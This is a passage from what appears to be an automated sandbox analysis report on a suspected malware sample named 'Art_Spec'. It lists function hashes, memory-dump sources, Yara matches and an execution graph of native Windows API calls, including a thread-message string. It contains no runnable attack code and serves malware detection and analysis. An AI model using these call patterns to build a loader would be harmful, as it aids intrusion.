                                                        • Opcode ID: 93edbd1349b216f337280708e2e4f748ee0e1519350062ab0b949bc821a32d54
                                                        • Instruction ID: 748d1d0674591cd46f8651fdeb4c9eb00af069e4697601c0600b8a6469f854bf
                                                        • Opcode Fuzzy Hash: 93edbd1349b216f337280708e2e4f748ee0e1519350062ab0b949bc821a32d54
                                                        • Instruction Fuzzy Hash: 2EA13C36A00205CFCF05DFB5C94459EB7B2FF85300B15C57AE909AB266EB31EA56CB80
                                                        Function 05307978 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8c7eef19e0f25294381a39241dd984d33709b5b207cfe7a1c988ea24343fe12
                                                        • Instruction ID: 44f42b719c27b4f7c507020be5f93a1f183cf58ec80ca4ecf875085039e112ae
                                                        • Opcode Fuzzy Hash: e8c7eef19e0f25294381a39241dd984d33709b5b207cfe7a1c988ea24343fe12
                                                        • Instruction Fuzzy Hash: FFD1E435D1065ACADB01EFA4D8A0B99B771FFD6300F10C79AE5493B211EB746AC9CB81
                                                        Function 05303EE3 Relevance: .2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a1bc40984ddb6450b8b5147755b41f43133fca1c8872cb6967b234f9408115e
                                                        • Instruction ID: acc377167443b2c78a187617907ac1502e2bcec2938db902d226a1cdab19df5f
                                                        • Opcode Fuzzy Hash: 9a1bc40984ddb6450b8b5147755b41f43133fca1c8872cb6967b234f9408115e
                                                        • Instruction Fuzzy Hash: 78518D34B00204DFDB189E75D869B6EBAB3FBC8700F249469EA06AB7D0DA75DD018B51
                                                        Function 0530190A Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9857febb55508d8d6e1eb3b7d4691bcd4108cd5bab510777d1bb97822ef0d06f
                                                        • Instruction ID: 82e488e56a32ff1a4a3ca48b58b4b950d3cf02e7ee6d37b24a4101b794467e5f
                                                        • Opcode Fuzzy Hash: 9857febb55508d8d6e1eb3b7d4691bcd4108cd5bab510777d1bb97822ef0d06f
                                                        • Instruction Fuzzy Hash: 0541E231714715CFC720CB69C895A6ABBF6FF85350B44D42AE09ACBAA0D234E945CF45
                                                        Function 05301918 Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39926115d8d593259cd842e7533fa31fec31c181ad16dfb4c8add4e168343709
                                                        • Instruction ID: 31b42ffbd60f51712d9fcdb43b7b154530320435eb3b1e39198406812791539b
                                                        • Opcode Fuzzy Hash: 39926115d8d593259cd842e7533fa31fec31c181ad16dfb4c8add4e168343709
                                                        • Instruction Fuzzy Hash: D0410531710705CFC720CB69C895A5BBBF6FF84350B44D82AE05ACBAA4D234E941CF45

                                                        Execution Graph

                                                        Execution Coverage:1.2%
                                                        Dynamic/Decrypted Code Coverage:5%
                                                        Signature Coverage:7.9%
                                                        Total number of Nodes:140
                                                        Total number of Limit Nodes:9
                                                        execution_graph 93288 424863 93292 424872 93288->93292 93289 4248b9 93296 42d553 93289->93296 93292->93289 93293 4248f7 93292->93293 93295 4248fc 93292->93295 93294 42d553 RtlFreeHeap 93293->93294 93294->93295 93299 42b9c3 93296->93299 93298 4248c9 93300 42b9e0 93299->93300 93301 42b9ee RtlFreeHeap 93300->93301 93301->93298 93302 41b1e0 93303 41b17c 93302->93303 93304 41b1e3 93302->93304 93306 41b1c8 93303->93306 93307 42b683 93303->93307 93308 42b69d 93307->93308 93309 42b6ab NtClose 93308->93309 93309->93306 93359 42e633 93360 42e643 93359->93360 93361 42e649 93359->93361 93362 42d633 RtlAllocateHeap 93361->93362 93363 42e66f 93362->93363 93364 4244d3 93365 4244ef 93364->93365 93366 424517 93365->93366 93367 42452b 93365->93367 93369 42b683 NtClose 93366->93369 93368 42b683 NtClose 93367->93368 93370 424534 93368->93370 93371 424520 93369->93371 93374 42d673 RtlAllocateHeap 93370->93374 93373 42453f 93374->93373 93375 42acf3 93376 42ad10 93375->93376 93379 13f2df0 LdrInitializeThunk 93376->93379 93377 42ad35 93379->93377 93310 414143 93311 41415c 93310->93311 93316 417b13 93311->93316 93313 41417a 93314 4141c6 93313->93314 93315 4141b3 PostThreadMessageW 93313->93315 93315->93314 93317 417b37 93316->93317 93318 417b73 LdrLoadDll 93317->93318 93319 417b3e 93317->93319 93318->93319 93319->93313 93320 41a683 93321 41a698 93320->93321 93323 41a6f2 93320->93323 93321->93323 93324 41e283 93321->93324 93325 41e2a9 93324->93325 93329 41e394 93325->93329 93330 42e763 93325->93330 93327 41e33b 93327->93329 93336 42ad43 93327->93336 93329->93323 93331 42e6d3 93330->93331 93333 42e730 93331->93333 93340 42d633 93331->93340 93333->93327 93334 42e70d 93335 42d553 RtlFreeHeap 93334->93335 93335->93333 93337 42ad5d 93336->93337 93346 13f2c0a 93337->93346 93338 42ad86 93338->93329 93343 42b973 93340->93343 93342 42d64e 93342->93334 93344 42b990 93343->93344 93345 42b99e RtlAllocateHeap 93344->93345 93345->93342 93347 13f2c1f LdrInitializeThunk 93346->93347 93348 13f2c11 93346->93348 93347->93338 93348->93338 93349 413d45 93350 413ce0 93349->93350 93351 413d4d 93349->93351 93354 42b8e3 93350->93354 93355 42b8fd 93354->93355 93358 13f2c70 LdrInitializeThunk 93355->93358 93356 413ce5 93358->93356 93380 418d18 93381 42b683 NtClose 93380->93381 93382 418d22 93381->93382 93383 4018d9 93384 40189f 93383->93384 93387 42eaf3 93384->93387 93390 42d143 93387->93390 93391 42d169 93390->93391 93402 407393 93391->93402 93393 42d17f 93401 401a18 93393->93401 93405 41af73 93393->93405 93395 42d19e 93398 42d1b3 93395->93398 93420 42ba13 93395->93420 93416 427793 93398->93416 93399 42d1c2 93400 42ba13 ExitProcess 93399->93400 93400->93401 93423 416843 93402->93423 93404 4073a0 93404->93393 93406 41af9f 93405->93406 93438 41ae63 93406->93438 93409 41afe4 93411 41b000 93409->93411 93414 42b683 NtClose 93409->93414 93410 41afcc 93412 41afd7 93410->93412 93413 42b683 NtClose 93410->93413 93411->93395 93412->93395 93413->93412 93415 41aff6 93414->93415 93415->93395 93417 4277ed 93416->93417 93418 4277fa 93417->93418 93449 418663 93417->93449 93418->93399 93421 42ba2d 93420->93421 93422 42ba3e ExitProcess 93421->93422 93422->93398 93425 41685a 93423->93425 93424 416870 93424->93404 93425->93424 93430 42c0c3 93425->93430 93427 4168be 93427->93424 93437 4283c3 NtClose LdrInitializeThunk 93427->93437 93429 4168e4 93429->93404 93432 42c0db 93430->93432 93431 42c0ff 93431->93427 93432->93431 93433 42ad43 LdrInitializeThunk 93432->93433 93434 42c151 93433->93434 93435 42d553 RtlFreeHeap 93434->93435 93436 42c16a 93435->93436 93436->93427 93437->93429 93439 41ae7d 93438->93439 93443 41af59 93438->93443 93444 42ade3 93439->93444 93442 42b683 NtClose 93442->93443 93443->93409 93443->93410 93445 42ae00 93444->93445 93448 13f35c0 LdrInitializeThunk 93445->93448 93446 41af4d 93446->93442 93448->93446 93451 418664 93449->93451 93450 418afb 93450->93418 93451->93450 93457 414273 93451->93457 93453 41879a 93453->93450 93454 42d553 RtlFreeHeap 93453->93454 93455 4187b2 93454->93455 93455->93450 93456 42ba13 ExitProcess 93455->93456 93456->93450 93459 414292 93457->93459 93458 4143b0 93458->93453 93459->93458 93461 413cc3 LdrInitializeThunk 93459->93461 93461->93458 93462 13f2b60 LdrInitializeThunk

                                                        Executed Functions

                                                        Function 00417B13 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 85 417b13-417b3c call 42e253 88 417b42-417b50 call 42e773 85->88 89 417b3e-417b41 85->89 92 417b60-417b71 call 42cc13 88->92 93 417b52-417b5d call 42ea13 88->93 98 417b73-417b87 LdrLoadDll 92->98 99 417b8a-417b8d 92->99 93->92 98->99
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction ID: 5084c3d16cd78f6066525c9c02257e451d1bbec126aea60e2d452a5e7d2945bd
                                                        • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction Fuzzy Hash: 410152B1E4410DB7DF10DAA1DC42FDEB3789B54308F004196E90897240F675EB448B95
                                                        Function 0042B683 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 110 42b683-42b6b9 call 404843 call 42c723 NtClose
                                                        APIs
                                                        • NtClose.NTDLL(?,0041674F,001F0001,?,00000000,?,?,00000104), ref: 0042B6B4
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction ID: 727abfe5acca37f02523496ed090aec1a3da151eb2021070b30343ae6eafb1de
                                                        • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction Fuzzy Hash: CEE0463A2002147BC620BA5AEC42F9B776CDBC5718F40442AFA08A7242C775BA148AE4
                                                        Function 013F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 124 13f2b60-13f2b6c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                        • Instruction ID: b04462930b64444472992489cf7867f9500ee920909b320a7d27ae53cfb9f1af
                                                        • Opcode Fuzzy Hash: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                        • Instruction Fuzzy Hash: 4990026161280143410671594514616400A97F0201B55C032E10145D5DC63589D16625
                                                        Function 013F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                        • Instruction ID: c1f91a5473c388d4e295ec2b9208c2d6c648bfc0214ac60bfb8534ea61156d2d
                                                        • Opcode Fuzzy Hash: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                        • Instruction Fuzzy Hash: 0F90023161180553D11271594604707000997E0241F95C423A042459DDD7768A92A621
                                                        Function 013F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                        • Instruction ID: 588fe6cd9f00427923295f1e6f00f600b68916a487e5e663b196aed6db70798d
                                                        • Opcode Fuzzy Hash: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                        • Instruction Fuzzy Hash: 8390023161188942D1117159850474A000597E0301F59C422A442469DDC7B589D17621
                                                        Function 013F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                        • Instruction ID: 2ece09d45874a90a8061e125b3e37cba69ffaea4bc08337e837f6e70ec38ee91
                                                        • Opcode Fuzzy Hash: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                        • Instruction Fuzzy Hash: A0900231A1590542D10171594614706100597E0201F65C422A04245ADDC7B58A916AA2
                                                        Function 00414143 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                        • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                        • Opcode Fuzzy Hash: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                        • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9
                                                        Function 00414142 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                        • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                        • Opcode Fuzzy Hash: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                        • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9
                                                        Function 00414129 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 28 414129-414130 29 414171-414174 28->29 30 414132-41413a 28->30 31 41417a-4141b1 call 4047b3 call 424973 29->31 32 414175 call 417b13 29->32 37 4141d3-4141d8 31->37 38 4141b3-4141c4 PostThreadMessageW 31->38 32->31 38->37 39 4141c6-4141d0 38->39 39->37
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 863dc4bff13a2bdcc0c376cc7bbc13f0ec12c02fa508ca47bb0c3be5bc91d30a
                                                        • Instruction ID: 7538764d688f28e64d3d492fe8e1fb6d99a2cdbcdddd34a5648222fe9cda664d
                                                        • Opcode Fuzzy Hash: 863dc4bff13a2bdcc0c376cc7bbc13f0ec12c02fa508ca47bb0c3be5bc91d30a
                                                        • Instruction Fuzzy Hash: 61012672A4621876DB215B55AC02FEFB7689F81B20F000097FE04AB384D6B85A9187D9
                                                        Function 00414125 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 40 414125-41417f 42 414186-4141b1 call 424973 40->42 43 414181 call 4047b3 40->43 46 4141d3-4141d8 42->46 47 4141b3-4141c4 PostThreadMessageW 42->47 43->42 47->46 48 4141c6-4141d0 47->48 48->46
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction ID: be414c5d9c22e3dbbac0c223527f73d90a181cd4a999129798f9bcd0ab32efbc
                                                        • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction Fuzzy Hash: B0F02BB5E4126875D72156915C06FEF7B688F81B50F144096FE007B2C1D6F85A4287D9
                                                        Function 0042B973 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 100 42b973-42b9b4 call 404843 call 42c723 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041E33B,?,?,00000000,?,0041E33B,?,?,?), ref: 0042B9AF
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction ID: 608937f996600ceb944568eee28253b0e1a79cb224aaa0ff6171d668f3876b15
                                                        • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                        • Instruction Fuzzy Hash: DFE092B63042057BD610EE89EC41E9B37ACEFC9710F008419F909A7281D770BA10CBB5
                                                        Function 0042B9C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 42b9c3-42ba04 call 404843 call 42c723 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,004173E6,000000F4,?,?,?,?,?), ref: 0042B9FF
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction ID: 42988263531b94dbbb2a4d015e1e709027e39004e6f1cdd4b6e0b11babbf2e4c
                                                        • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                        • Instruction Fuzzy Hash: C3E06D762042447BD610EE59EC41EDB33ACEFC4710F004419F908A7241D671B9118AB4
                                                        Function 0042BA13 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 115 42ba13-42ba4c call 404843 call 42c723 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(?,00000000,?,?,EE1174AF,?,?,EE1174AF), ref: 0042BA47
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: f4c8ccc93cc9a54f4d2a5ff418d0cbb94d9e43498e2faa9f5866a5e759374b8d
                                                        • Instruction ID: 38e42b315f6343636fcddd2e2961c7e70ce04384088d5dfede6638441cba869f
                                                        • Opcode Fuzzy Hash: f4c8ccc93cc9a54f4d2a5ff418d0cbb94d9e43498e2faa9f5866a5e759374b8d
                                                        • Instruction Fuzzy Hash: 91E04F362102147BD110BA5ADC41FDBB76CDFC5714F004419FA0C67242D6707A1186E4
                                                        Function 013F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 120 13f2c0a-13f2c0f 121 13f2c1f-13f2c26 LdrInitializeThunk 120->121 122 13f2c11-13f2c18 120->122
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
                                                        • Instruction ID: 40f17b9abc4e5a11b7234fde54eca58a87b5f9aed2c49df71f13bedcf31bee13
                                                        • Opcode Fuzzy Hash: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
                                                        • Instruction Fuzzy Hash: 26B09B71D019C5C5DE12E76447087177900B7D0705F15C076D3030686F8738C1D1E675

                                                        Non-executed Functions

                                                        Function 01432349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        • Opcode ID: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
                                                        • Instruction ID: 0690fbc85b6e39226d86efc5590c0ad3a02e0fd217d974e5ad1ae8dc7e2427fc
                                                        • Opcode Fuzzy Hash: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
                                                        • Instruction Fuzzy Hash: 33928E71604342ABE725DF29C841F6BBBE8BB88754F04491EFA94D7360D7B0E845CB92
                                                        Function 013E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Critical section debug info address, xrefs: 0142541F, 0142552E
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0142540A, 01425496, 01425519
                                                        • undeleted critical section in freed memory, xrefs: 0142542B
                                                        • corrupted critical section, xrefs: 014254C2
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254E2
                                                        • Thread identifier, xrefs: 0142553A
                                                        • 8, xrefs: 014252E3
                                                        • Address of the debug info found in the active list., xrefs: 014254AE, 014254FA
                                                        • double initialized or corrupted critical section, xrefs: 01425508
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254CE
                                                        • Invalid debug info address of this critical section, xrefs: 014254B6
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01425543
                                                        • Critical section address., xrefs: 01425502
                                                        • Critical section address, xrefs: 01425425, 014254BC, 01425534
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: cc8faa276f6b4509142d59d84c507ae91e312654550cb31f03b8b869a7c8e53a
                                                        • Instruction ID: 034469774adf101a0d5ea47d00ae87e049e3c53a5aa191d485c42d1e393c4be6
                                                        • Opcode Fuzzy Hash: cc8faa276f6b4509142d59d84c507ae91e312654550cb31f03b8b869a7c8e53a
